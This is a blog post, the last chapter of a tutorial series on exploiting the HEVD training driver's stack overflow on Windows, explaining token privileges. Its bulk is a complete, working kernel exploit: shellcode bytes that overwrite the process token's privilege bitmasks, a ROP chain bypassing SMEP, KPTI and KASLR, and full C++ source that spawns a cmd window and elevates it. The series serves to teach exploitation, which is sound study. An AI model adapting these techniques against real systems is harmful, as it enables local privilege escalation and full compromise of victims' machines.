Jan 8, 2023

[Cracking Windows Kernel with HEVD] Chapter 4: How do we write a shellcode to elevate privileges and gracefully return to userland?

The end is near

Throughout the previous four chapters, all we have done is exploit a stack-based buffer overflow and bypass a few kernel mitigations. Apart from the kernel-specific memory mitigations, the exploitation so far has been as vanilla as it gets: a stack overflow with no canary.

In this final post, we will dive into the Windows privilege mechanism and use it to elevate our privileges. Then we must return to userland. After all, there is no use in elevating privileges or executing code in ring0 if the computer is going to crash right afterwards! The problem is that our ROP payload has corrupted the stack, not to mention the registers, which we have clobbered wholesale. Restoring all of them would be impractical. That will be our main challenge today.

How privileges work on Windows

It would be difficult to cover how security works on Windows, or even everything about how privileges work, in a single post, so I'll only cover the basics of privileges here. Later on, I plan to write another post just on the Windows security architecture, but at my current posting pace this could take as long as a century ^^ (sorry about that!)

"A privilege is the right of an account, such as a user or group account, to perform various system-related operations on the local computer, such as shutting down the system, loading device drivers or changing the system time."

That is Microsoft's definition of privileges on Windows. Privileges do not govern access to securable objects (such as files and folders); they govern access to system resources and system-related tasks. You can list them in a Windows terminal with the whoami command: whoami /priv.

This is what appears when a low-privilege user checks its own privileges:

Here we see an administrator:

As you can see, some privileges appear only for the administrator. Each privilege also has a state: enabled or disabled. In reality, there are three possible attributes for a privilege: present, enabled and enabled by default. Present privileges are the ones listed by whoami. A present privilege may be enabled or disabled, but a privilege that is not present cannot be enabled at all. The state is straightforward: if a privilege is enabled, it can be used; otherwise, it must be enabled first. The "enabled by default" attribute is just as intuitive: it marks privileges that start out enabled.
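To make these rules concrete, here is a tiny user-mode model of the three attributes, one bit per privilege. It is my own simplification, not kernel code: PrivilegeMasks, enable_privilege, disable_privilege and is_usable are hypothetical names, and the bit numbers are assumed to follow the privilege table further down (20 = SeDebugPrivilege, 23 = SeChangeNotifyPrivilege).

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical model of a token's privilege attributes: one bit per privilege.
struct PrivilegeMasks {
    uint64_t present;
    uint64_t enabled;
    uint64_t enabled_by_default;
};

// Enabling only succeeds for privileges that are present in the token.
bool enable_privilege(PrivilegeMasks &m, unsigned bit) {
    const uint64_t mask = 1ULL << bit;
    if ((m.present & mask) == 0) {
        return false;  // not present: cannot be enabled
    }
    m.enabled |= mask;
    return true;
}

// Disabling just clears the enabled bit; the privilege stays present.
void disable_privilege(PrivilegeMasks &m, unsigned bit) {
    m.enabled &= ~(1ULL << bit);
}

// A privilege can be used only if it is both present and enabled.
bool is_usable(const PrivilegeMasks &m, unsigned bit) {
    const uint64_t mask = 1ULL << bit;
    return (m.present & mask) != 0 && (m.enabled & mask) != 0;
}
```

For example, a token holding only SeChangeNotifyPrivilege (bit 23) cannot enable SeDebugPrivilege (bit 20), because that bit is not present.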

Ok, so these privileges are associated with the user. But what about processes?

Well, the kernel keeps a structure named EPROCESS for each process. Among other things, it holds a reference to another very important data structure named TOKEN. Access token objects "include the identity and privileges of the user account associated with the process or thread", as Microsoft explains. When a user starts a new process, the system gives it a copy of the user's access token, referenced from the EPROCESS structure. If we intend to elevate the privileges of a process, this is the data structure we will tamper with.

Amongst the many pieces of information stored in the token structure, such as the security identifier (SID) of the user account, the SIDs of the groups the user belongs to and the impersonation level, it also stores the privileges held by the user (or the user's groups). These are the privileges I talked about earlier! They live in a data structure called _SEP_TOKEN_PRIVILEGES, whose definition follows:

kd> dt _SEP_TOKEN_PRIVILEGES
nt!_SEP_TOKEN_PRIVILEGES
   +0x000 Present          : Uint8B
   +0x008 Enabled          : Uint8B
   +0x010 EnabledByDefault : Uint8B

That's right! Each field is a Uint8B (an 8-byte unsigned integer), and each privilege is represented by one bit in each of the three bitmasks: present, enabled and enabled by default. The bit positions correspond to the privileges below:

    2: SeCreateTokenPrivilege -> Create a token object
    3: SeAssignPrimaryTokenPrivilege -> Replace a process-level token
    4: SeLockMemoryPrivilege -> Lock pages in memory
    5: SeIncreaseQuotaPrivilege -> Increase quotas
    6: SeMachineAccountPrivilege -> Add workstations to the domain
    7: SeTcbPrivilege -> Act as part of the operating system
    8: SeSecurityPrivilege -> Manage auditing and security log
    9: SeTakeOwnershipPrivilege -> Take ownership of files/objects
    10: SeLoadDriverPrivilege -> Load and unload device drivers
    11: SeSystemProfilePrivilege -> Profile system performance
    12: SeSystemtimePrivilege -> Change the system time
    13: SeProfileSingleProcessPrivilege -> Profile a single process
    14: SeIncreaseBasePriorityPrivilege -> Increase scheduling priority
    15: SeCreatePagefilePrivilege -> Create a pagefile
    16: SeCreatePermanentPrivilege -> Create permanent shared objects
    17: SeBackupPrivilege -> Backup files and directories
    18: SeRestorePrivilege -> Restore files and directories
    19: SeShutdownPrivilege -> Shut down the system
    20: SeDebugPrivilege -> Debug programs
    21: SeAuditPrivilege -> Generate security audits
    22: SeSystemEnvironmentPrivilege -> Edit firmware environment values
    23: SeChangeNotifyPrivilege -> Receive notifications of changes to files or directories
    24: SeRemoteShutdownPrivilege -> Force shutdown from a remote system
    25: SeUndockPrivilege -> Remove computer from docking station
    26: SeSyncAgentPrivilege -> Synch directory service data
    27: SeEnableDelegationPrivilege -> Enable user accounts to be trusted for delegation
    28: SeManageVolumePrivilege -> Manage the files on a volume
    29: SeImpersonatePrivilege -> Impersonate a client after authentication
    30: SeCreateGlobalPrivilege -> Create global objects
    31: SeTrustedCredManAccessPrivilege -> Access Credential Manager as a trusted caller
    32: SeRelabelPrivilege -> Modify the mandatory integrity level of an object
    33: SeIncreaseWorkingSetPrivilege -> Allocate more memory for user applications
    34: SeTimeZonePrivilege -> Adjust the time zone of the computer's internal clock
    35: SeCreateSymbolicLinkPrivilege -> Required to create a symbolic link

Credit where it's due: this list was found here. Thank you, Volatility Foundation.
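To tie the WinDbg output and the table together, here is a user-mode sketch of my own (not from Volatility or the Windows headers) that mirrors _SEP_TOKEN_PRIVILEGES with 8-byte fields and decodes a mask into privilege names using the bit indices above. SepTokenPrivileges, kPrivilegeNames and decode_privileges are hypothetical names; the field layout follows the dt output.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// User-mode mirror of nt!_SEP_TOKEN_PRIVILEGES as dumped by WinDbg (Uint8B = 8 bytes).
struct SepTokenPrivileges {
    uint64_t Present;
    uint64_t Enabled;
    uint64_t EnabledByDefault;
};
static_assert(offsetof(SepTokenPrivileges, Present) == 0x00, "Present at +0x000");
static_assert(offsetof(SepTokenPrivileges, Enabled) == 0x08, "Enabled at +0x008");
static_assert(offsetof(SepTokenPrivileges, EnabledByDefault) == 0x10, "EnabledByDefault at +0x010");
static_assert(sizeof(SepTokenPrivileges) == 0x18, "three 8-byte fields");

// Bit index -> privilege name, copied from the table above (bits 0 and 1 are unused).
static const char *const kPrivilegeNames[36] = {
    nullptr, nullptr,
    "SeCreateTokenPrivilege", "SeAssignPrimaryTokenPrivilege", "SeLockMemoryPrivilege",
    "SeIncreaseQuotaPrivilege", "SeMachineAccountPrivilege", "SeTcbPrivilege",
    "SeSecurityPrivilege", "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege",
    "SeSystemProfilePrivilege", "SeSystemtimePrivilege", "SeProfileSingleProcessPrivilege",
    "SeIncreaseBasePriorityPrivilege", "SeCreatePagefilePrivilege", "SeCreatePermanentPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeShutdownPrivilege",
    "SeDebugPrivilege", "SeAuditPrivilege", "SeSystemEnvironmentPrivilege",
    "SeChangeNotifyPrivilege", "SeRemoteShutdownPrivilege", "SeUndockPrivilege",
    "SeSyncAgentPrivilege", "SeEnableDelegationPrivilege", "SeManageVolumePrivilege",
    "SeImpersonatePrivilege", "SeCreateGlobalPrivilege", "SeTrustedCredManAccessPrivilege",
    "SeRelabelPrivilege", "SeIncreaseWorkingSetPrivilege", "SeTimeZonePrivilege",
    "SeCreateSymbolicLinkPrivilege",
};

// Returns the names of all known privileges whose bit is set in `mask`, lowest bit first.
std::vector<std::string> decode_privileges(uint64_t mask) {
    std::vector<std::string> names;
    for (unsigned bit = 0; bit < 36; ++bit) {
        if (((mask >> bit) & 1ULL) != 0 && kPrivilegeNames[bit] != nullptr) {
            names.emplace_back(kPrivilegeNames[bit]);
        }
    }
    return names;
}
```

Feeding it, say, the Enabled field of a token would give roughly the "Enabled" rows of whoami /priv.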

You may notice that the list starts at 2 and goes all the way up to 35. Why does it not start at zero, like everything else in computer science? Well, the answer is far from obvious. It is so unobvious that I do not know for sure, but I suspect the two least significant bits must be zero so that a valid mask is not "mistaken" for -1. If a vulnerability allows an attacker to somehow change this structure (such as the one we are exploiting), it would probably be easier to set it to -1.

Ok, back to the exploit. "All" we have to do is change the _SEP_TOKEN_PRIVILEGES structure, which resides in the TOKEN structure, which is referenced by the EPROCESS structure, setting all of its fields (present, enabled and enabled by default, although the last one is optional) to 0xffffffffc, i.e. bits 2 through 35 set.
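The constant is nothing more than "every bit from 2 to 35". A short sketch (bit_range is a hypothetical helper of mine) derives it and shows what a narrower constant such as 0xfffffffc, the value actually encoded in the assembly later on, leaves out: bits 32 to 35 (SeRelabelPrivilege through SeCreateSymbolicLinkPrivilege), while still covering SeDebugPrivilege at bit 20.

```cpp
#include <cassert>
#include <cstdint>

// Mask with every bit from `low` to `high` (inclusive) set; assumes low <= high < 64.
constexpr uint64_t bit_range(unsigned low, unsigned high) {
    return ((high >= 63) ? ~0ULL : ((1ULL << (high + 1)) - 1)) & ~((1ULL << low) - 1);
}

// All privileges in the table: bits 2..35.
constexpr uint64_t kAllPrivileges = bit_range(2, 35);
static_assert(kAllPrivileges == 0xffffffffcULL, "bits 2..35");

// The 32-bit variant: bits 2..31 only.
constexpr uint64_t kLow32Privileges = bit_range(2, 31);
static_assert(kLow32Privileges == 0xfffffffcULL, "bits 2..31");
```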

If we locate this structure in memory and alter it, we have our privilege escalation!

Carving a shellcode

As mentioned, to alter the privileges structure we must first locate it inside the token structure. Given an EPROCESS structure, finding the primary token is trivial with the PsReferencePrimaryToken function: it returns a pointer to the token!

To use this function, we need an EPROCESS object. No problem! PsLookupProcessByProcessId gives us exactly that, provided we supply the PID of the process.

With the token structure at hand, we have to find the privileges structure inside it in order to alter it. The dt command in WinDbg reveals its offset:

It resides at offset 0x40. Neat. So far, the steps we must take are these:

    1. From a PID, use PsLookupProcessByProcessId() to obtain the EPROCESS object of the process whose privileges will be elevated;
    2. From this EPROCESS object, obtain the TOKEN structure with PsReferencePrimaryToken();
    3. From the TOKEN structure, locate the _SEP_TOKEN_PRIVILEGES structure at offset 0x40;
    4. Set each field of this structure to 0xffffffffc.
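The pointer walk in these four steps can be modelled in user mode. The sketch below is a simulation only: mock_lookup_process and mock_reference_primary_token are hypothetical stand-ins for PsLookupProcessByProcessId() and PsReferencePrimaryToken(), the mock TOKEN is a plain byte buffer, and the 0x40 offset is the one WinDbg showed on the build used here (other Windows builds may lay out _TOKEN differently).

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr size_t kPrivilegesOffset = 0x40;  // _TOKEN.Privileges on the build used here

// Mock objects; the real EPROCESS and TOKEN are opaque kernel structures.
struct MockToken { unsigned char bytes[0x100]; };
struct MockProcess { uint32_t pid; MockToken *token; };

// Hypothetical stand-in for PsLookupProcessByProcessId(): returns the process via an out parameter.
bool mock_lookup_process(MockProcess *table, size_t count, uint32_t pid, MockProcess **out) {
    for (size_t i = 0; i < count; ++i) {
        if (table[i].pid == pid) {
            *out = &table[i];
            return true;
        }
    }
    return false;
}

// Hypothetical stand-in for PsReferencePrimaryToken(): returns the token pointer.
MockToken *mock_reference_primary_token(MockProcess *process) {
    return process->token;
}

// Steps 1-4: PID -> process -> token -> token + 0x40 -> overwrite three 8-byte fields.
bool elevate_mock(MockProcess *table, size_t count, uint32_t pid, uint64_t value) {
    MockProcess *process = nullptr;
    if (!mock_lookup_process(table, count, pid, &process)) {
        return false;
    }
    unsigned char *privileges = mock_reference_primary_token(process)->bytes + kPrivilegesOffset;
    for (int field = 0; field < 3; ++field) {  // Present, Enabled, EnabledByDefault
        std::memcpy(privileges + field * 8, &value, sizeof value);
    }
    return true;
}
```

The shellcode below performs the same walk, except that the lookups are real kernel calls and the writes land in the real token.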

Alright. Let's write some assembly code:

mov rcx, <PID> ; The first argument to PsLookupProcessByProcessId() is the PID. It will be patched in dynamically. In the Windows x64 calling convention, rcx holds the first argument.
sub rsp, 0x8 ; The second argument to PsLookupProcessByProcessId() is an out parameter that receives a pointer to the EPROCESS structure. I'm reserving 8 bytes on the stack for it.
mov rdx, rsp ; The second argument is a pointer to the 8 bytes we just reserved. rdx holds the second argument in the Windows x64 calling convention, remember?
movabs rbx, <ADDRESS OF PsLookupProcessByProcessId()> ;
call rbx ; Actually call the function! The EPROCESS pointer will be stored at [rsp].

mov rcx, QWORD PTR [rsp] ; Load the EPROCESS pointer into rcx, the first and only argument of PsReferencePrimaryToken()
movabs rbx, <ADDRESS OF PsReferencePrimaryToken()> ;
call rbx ; Call PsReferencePrimaryToken! The token address comes back as the return value, i.e. in the rax register.
add rax, 0x40 ; Adjust the offset. Now rax points directly to _SEP_TOKEN_PRIVILEGES.
movabs rcx, 0xfffffffc ; The value written to each _SEP_TOKEN_PRIVILEGES field (bits 2 to 31; 0xffffffffc would also cover bits 32 to 35).
mov QWORD PTR [rax], rcx ; Now the magic happens! Overwrite the first field (Present).
add rax, 0x8 ; Next field...
mov QWORD PTR [rax], rcx ; Overwrite the second field (Enabled).
add rax, 0x8 ; Final field
mov QWORD PTR [rax], rcx ; Overwrite the third field (EnabledByDefault).
add rsp, 0x8 ; Release the 8 bytes reserved for the EPROCESS pointer.

There is one more thing we must do: return to userland gracefully.

Kristal discovered a nice approach for returning to userland with sysret. Sysret is to syscall what ret is to call, but with extra steps.

On a normal return to userland, the OS restores the execution context and returns gracefully. What Kristal did (and I encourage you to read his post) was mimic the way the OS returns to userland. His approach did not work here, though, because KPTI was enabled.

Windows has two return paths: one for when KPTI is disabled and another for when it is enabled. As far as I know, neither Kristal nor anyone else has developed an approach for the KPTI-enabled path. Well, neither have I.

Windows has a specific function for returning to userland, called KiKernelSysretExit(). My first, naive approach was to jump to that function at the end of my shellcode and let the kernel do the heavy lifting instead of doing it myself in the shellcode. To my surprise, it actually worked.

I added two extra lines to the shellcode:

movabs rbx, <ADDRESS_TO_SYSRET_KERNEL_FUNCTION>;
jmp rbx;

And the kernel did the rest!

I used my boy Vinicius's brilliant shellcoding tools to turn my assembly code into opcodes. Then I put the bytes in a variable and patched the addresses at runtime. My generate_shellcode() function now looks like this:

char *generate_shellcode() {
	char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x4e+11); //0x4e+11 is the size of the shellcode
	memcpy(shellcode, "\x48\xc7\xc1\x78\x56\x34\x12\x48\x83\xec\x08\x48\x89\xe2\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff\xff\xd3\x48\x8b\x0c\x24\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff\xff\xd3\x48\x83\xc0\x40\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc4\x08\x48\xBB\xC0\x0D\x02\x1B\x05\xF8\xFF\xFF\xFF\xE3", 0x4e+11);
	memcpy(shellcode + 3, &pid, 4); // imm32 of "mov rcx, <PID>" (right after 48 c7 c1)
	memcpy(shellcode + 16, &kernel_PsLookupProcessByProcessId, 8); // imm64 of the first "movabs rbx": PsLookupProcessByProcessId address
	memcpy(shellcode + 32, &kernel_PsReferencePrimaryToken, 8); // imm64 of the second "movabs rbx": PsReferencePrimaryToken address
	memcpy(shellcode + 0x4e+1, &kernel_sysret, 8); // imm64 of the last "movabs rbx": sysret exit function (KiKernelSysretExit) address
	return shellcode;
}
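Patching at hard-coded offsets is easy to get wrong by a byte. A small sketch of a safer patch step, with hypothetical helper names: it writes a little-endian immediate only if the expected opcode bytes sit right before it. The demo uses just the first instruction of the listing, mov rcx, imm32 (48 c7 c1 followed by a 4-byte immediate), and assumes a little-endian host, as x64 Windows is.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Copies `size` bytes of `value` to buf[offset], but only if the `opcode_len` bytes
// right before that offset match `opcode` (e.g. 48 c7 c1 for mov rcx, imm32, or
// 48 bb for movabs rbx, imm64). Assumes a little-endian host.
bool patch_immediate(unsigned char *buf, size_t buf_len, size_t offset,
                     const unsigned char *opcode, size_t opcode_len,
                     const void *value, size_t size) {
    if (offset < opcode_len || offset + size > buf_len) {
        return false;  // immediate would not fit inside the buffer
    }
    if (std::memcmp(buf + offset - opcode_len, opcode, opcode_len) != 0) {
        return false;  // wrong offset: the expected opcode is not there
    }
    std::memcpy(buf + offset, value, size);
    return true;
}
```

In generate_shellcode() the same check holds for every patch site: offset 3 follows 48 c7 c1, and offsets 16, 32 and 0x4e+1 each follow 48 bb.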

And boom! It worked!

The final exploit

I ran the exploit:

On the left, we see my exploit's debug messages. On the right is the CMD it spawned, whose privileges will be elevated. I ran whoami /priv in it to confirm that it is unprivileged.

When I press enter on the exploit terminal, the privileges are elevated.

Finally! The system did not crash and privileges were elevated. I will leave the full source code at the end of the post.

Conclusions

We did it! Phew, this took forever for me to write. I apologize for the extremely long delay. From this exercise, we may conclude a few things:

Windows kernel mitigations are not that powerful. Windows' KASLR is easily bypassed when running at medium integrity level or above. SMEP is useful, but there is a neat gadget that bypasses it easily. KPTI was the toughest enemy, but it can be bypassed by allocating an executable pool and jumping to it.
If we cannot restore the stack, we can just let the kernel do the heavy lifting by jumping to its own exit function.
Assembly programming is very useful for shellcoding at this level.

Hope you enjoyed it! See you next time.

Source code

#include <iostream>
#include <string>
#include <cstdio>   // printf
#include <cstdlib>  // system
#include <cstring>  // memcpy, memset
#include <Windows.h>
#include <Psapi.h>

// Name of the device
#define DEVICE_NAME	"\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)

unsigned long long g_add_rsp_20h_ret = 0xa155de;


unsigned long long g_pop_rdi_pop_r14_pop_rbx_ret = 0x20a518;
unsigned long long g_xor_ecx_ecx_mov_rax_rcx_ret = 0x38cf53;
unsigned long long g_pop_rdx_ret = 0x416748;
unsigned long long g_push_rax_pop_rbx_ret = 0x20a263;
unsigned long long g_push_rax_pop_r13_ret = 0x5af724;
unsigned long long g_xchg_r8_r13_ret = 0x2c0da6;
unsigned long long g_mov_rcx_r8_mov_rax_rcx_ret = 0x93ac7a;
unsigned long long g_pop_r8_ret = 0x2017f1;
unsigned long long g_jmp_rbx = 0x408aa2;
unsigned long long kernel_ExAllocatePoolWithTag;
unsigned long long kernel_sysret = 0xa13dc0;
unsigned long long kernel_memcpy;


DWORD pid;

typedef struct sSepTokenPrivileges {
	UINT64 present;             // WinDbg shows Uint8B: an 8-byte unsigned integer, not a byte
	UINT64 enabled;
	UINT64 enabled_by_default;
} SEP_TOKEN_PRIVILEGES;

typedef NTSTATUS(*_PsLookupProcessByProcessId)(IN HANDLE, OUT PVOID *);
_PsLookupProcessByProcessId kernel_PsLookupProcessByProcessId;

typedef PVOID(*_PsReferencePrimaryToken)(PVOID);
_PsReferencePrimaryToken kernel_PsReferencePrimaryToken;

// IOCTL number for the stack overflow
#define STACK_OVERFLOW_IOCTL_NUMBER     IOCTL(0x800)

// Returns kernel base address
unsigned long long get_kernel_base_addr() {
	LPVOID drivers[1024];
	DWORD cbNeeded;

	EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);

	return (unsigned long long)drivers[0];
}

// Gets the handle for the device driver
HANDLE get_handle() {
	HANDLE h = CreateFileA(DEVICE_NAME,
		FILE_READ_ACCESS | FILE_WRITE_ACCESS,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
		NULL);

	if (h == INVALID_HANDLE_VALUE) {
		printf("Failed to get handle =(\n");
		return NULL;
	}
	return h;
}

void add_to_payload(char *in_buffer, SIZE_T *offset, unsigned long long *data, SIZE_T size)
{
	memcpy(in_buffer + *offset, data, size);
	printf("Wrote %llx to offset %zu\n", *data, *offset);
	*offset += size;
}

PVOID get_kernel_symbol_addr(const char *symbol) {
	PVOID kernelBaseAddr;
	HMODULE userKernelHandle;
	PCHAR functionAddress;
	unsigned long long offset;

	kernelBaseAddr = (PVOID)get_kernel_base_addr();  // Loads kernel base address
	userKernelHandle = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe");  // Gets kernel binary

	if (userKernelHandle == NULL) {  // LoadLibraryA returns NULL on failure
		return NULL;
	}

	functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol);  // Finds given symbol
	if (functionAddress == NULL) {
		// Could not find symbol
		return NULL;
	}

	offset = functionAddress - ((PCHAR)userKernelHandle);  // Subtracts the loaded binary's base address from the found address. This way, we will find the offset of the symbol for base address 0.
	return (PVOID)(((PCHAR)kernelBaseAddr) + offset);  // Adds the offset to the leaked base address.
}

void adjust_offsets()
{
	unsigned long long kernel_base_addr = get_kernel_base_addr();
	g_xor_ecx_ecx_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_rdi_pop_r14_pop_rbx_ret += kernel_base_addr;
	g_add_rsp_20h_ret += kernel_base_addr;
	g_pop_rdx_ret += kernel_base_addr;
	g_push_rax_pop_rbx_ret += kernel_base_addr;
	g_push_rax_pop_r13_ret += kernel_base_addr;
	g_xchg_r8_r13_ret += kernel_base_addr;
	g_mov_rcx_r8_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_r8_ret += kernel_base_addr;
	g_jmp_rbx += kernel_base_addr;
	
	kernel_sysret += kernel_base_addr;
	kernel_ExAllocatePoolWithTag = (unsigned long long) get_kernel_symbol_addr("ExAllocatePoolWithTag");
	kernel_memcpy = (unsigned long long) get_kernel_symbol_addr("memcpy");
	kernel_PsLookupProcessByProcessId = (_PsLookupProcessByProcessId) get_kernel_symbol_addr("PsLookupProcessByProcessId");
	kernel_PsReferencePrimaryToken = (_PsReferencePrimaryToken) get_kernel_symbol_addr("PsReferencePrimaryToken");
	printf("PsReferencePrimaryToken offset from kernel base: 0x%llx\n", (ULONGLONG)kernel_PsReferencePrimaryToken - kernel_base_addr);
}


DWORD spawnCmd() {
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	char cmd[] = "C:\\Windows\\System32\\cmd.exe";

	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));

	// Start the child process (ANSI version, since cmd is a char buffer).
	if (!CreateProcessA(NULL,	// No module name (use command line)
		cmd,					// Command line
		NULL,					// Process handle not inheritable
		NULL,					// Thread handle not inheritable
		FALSE,					// Set handle inheritance to FALSE
		CREATE_NEW_CONSOLE,     // Open the child in its own console window
		NULL,					// Use parent's environment block
		NULL,					// Use parent's starting directory 
		&si,					// Pointer to STARTUPINFOA structure
		&pi)					// Pointer to PROCESS_INFORMATION structure
		)
	{
		printf("CreateProcess failed (%lu).\n", GetLastError());
		return (DWORD)-1;
	}

	// Only the PID is needed; release the handles CreateProcessA gave us.
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	return pi.dwProcessId;
}

char *generate_shellcode() {
	char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x4e+11);
	memcpy(shellcode, "\x48\xc7\xc1\x78\x56\x34\x12\x48\x83\xec\x08\x48\x89\xe2\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff\xff\xd3\x48\x8b\x0c\x24\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff\xff\xd3\x48\x83\xc0\x40\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc4\x08\x48\xBB\xC0\x0D\x02\x1B\x05\xF8\xFF\xFF\xFF\xE3", 0x4e+11);
	memcpy(shellcode + 3, &pid, 4);
	memcpy(shellcode + 16, &kernel_PsLookupProcessByProcessId, 8);
	memcpy(shellcode + 32, &kernel_PsReferencePrimaryToken, 8);
	memcpy(shellcode + 0x4e+1, &kernel_sysret, 8);
	return shellcode;
}

//Does everything
void do_buffer_overflow(HANDLE h)
{
	SIZE_T in_buffer_size = 2072 + 8 * 15 + 0x20;
	PULONG in_buffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, in_buffer_size);
	memset((char *)in_buffer, 'A', in_buffer_size);
	
	SIZE_T offset = 2072;

	pid = spawnCmd();
	adjust_offsets();
	char *shellcode = generate_shellcode();

	unsigned long long size_of_copy = 0x4e+11;

	add_to_payload((char*)in_buffer, &offset, &g_xor_ecx_ecx_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
	add_to_payload((char*)in_buffer, &offset, &kernel_ExAllocatePoolWithTag, 8);
	add_to_payload((char*)in_buffer, &offset, &g_add_rsp_20h_ret, 8);
	offset += 0x20;

	add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_rbx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_r13_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_xchg_r8_r13_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_mov_rcx_r8_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, (unsigned long long *)(&shellcode), 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_r8_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
	add_to_payload((char*)in_buffer, &offset, &kernel_memcpy, 8);
	add_to_payload((char*)in_buffer, &offset, &g_jmp_rbx, 8);
	

	system("pause");
	printf("Sending buffer.\n");
	//Sends buffer through IOCTL
	bool result = DeviceIoControl(h, STACK_OVERFLOW_IOCTL_NUMBER, in_buffer, (DWORD)in_buffer_size, NULL, 0, NULL, NULL);
	if (!result)
	{
		printf("IOCTL Failed: %X\n", GetLastError());
	}
	//Frees allocated memory
	HeapFree(GetProcessHeap(), 0, (LPVOID)in_buffer);
}


int main(int argc, char **argv)
{
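	HANDLE h = get_handle();
	if (h == NULL) {
		return 1;  // Driver not reachable; get_handle() already printed an error
	}
	do_buffer_overflow(h);
	system("pause");
	return 0;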
}
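Both get_kernel_symbol_addr() and adjust_offsets() rely on the same rebasing arithmetic: an offset (RVA) measured once, either in a user-mode mapping of ntoskrnl.exe or for a gadget, stays valid when added to the kernel base leaked by EnumDeviceDrivers(), because it is the same image loaded at a different address. A minimal sketch with hypothetical helper names and purely illustrative addresses:

```cpp
#include <cassert>
#include <cstdint>

// RVA of a symbol: where it was found in our own mapping minus that mapping's base.
uint64_t symbol_rva(uint64_t user_symbol_addr, uint64_t user_module_base) {
    return user_symbol_addr - user_module_base;
}

// Kernel address: leaked kernel base plus the RVA (same image, different load address).
uint64_t rebase(uint64_t kernel_base, uint64_t rva) {
    return kernel_base + rva;
}
```

With a leaked base of 0xfffff80000000000, for instance, the kernel_sysret offset 0xa13dc0 from the listing becomes 0xfffff80000a13dc0, which is exactly what adjust_offsets() computes with +=.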